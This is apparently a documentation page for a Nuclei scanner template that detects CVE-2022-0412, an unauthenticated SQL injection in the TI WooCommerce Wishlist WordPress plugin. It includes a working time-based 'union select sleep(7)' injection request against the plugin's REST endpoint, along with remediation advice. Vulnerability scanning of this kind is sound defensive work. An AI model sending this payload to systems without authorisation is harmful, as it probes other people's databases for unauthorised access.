WordPress TI WooCommerce Wishlist <1.40.1 - SQL Injection
ID: CVE-2022-0412
Severity: critical
Author: edoardottt
Tags: time-based-sqli,cve2022,cve,sqli,ti-woocommerce-wishlist,wpscan,woocommerce,wordpress,wp-plugin,wp,templateinvaders
Description
Section titled “Description”WordPress TI WooCommerce Wishlist plugin before 1.40.1 contains a SQL injection vulnerability. The plugin does not sanitize and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint.
YAML Source
Section titled “YAML Source”id: CVE-2022-0412
info: name: WordPress TI WooCommerce Wishlist <1.40.1 - SQL Injection author: edoardottt severity: critical description: | WordPress TI WooCommerce Wishlist plugin before 1.40.1 contains a SQL injection vulnerability. The plugin does not sanitize and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint. impact: | Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database. remediation: | Update to the latest version of the TI WooCommerce Wishlist plugin (1.40.1 or higher). reference: - https://wpscan.com/vulnerability/e984ba11-abeb-4ed4-9dad-0bfd539a9682 - https://wordpress.org/plugins/ti-woocommerce-wishlist/advanced/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0412 - https://plugins.trac.wordpress.org/changeset/2668899 - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-0412 cwe-id: CWE-89 epss-score: 0.10259 epss-percentile: 0.94816 cpe: cpe:2.3:a:templateinvaders:ti_woocommerce_wishlist:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: templateinvaders product: ti_woocommerce_wishlist framework: wordpress tags: time-based-sqli,cve2022,cve,sqli,ti-woocommerce-wishlist,wpscan,woocommerce,wordpress,wp-plugin,wp,templateinvaders
http: - raw: - | @timeout: 15s GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: dsl dsl: - 'duration>=7'
- type: word part: body words: - 'Product not found'
- type: status status: - 400# digest: 4a0a00473045022059e599c56370b45d7dbba3aaf403985fe64ac09131a0519d52dbdcf118da12f2022100ed243a0f77eb400326be5230d37c47b8a91c14db61c3e7fed2fffa148fb6c552:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-0412.yaml"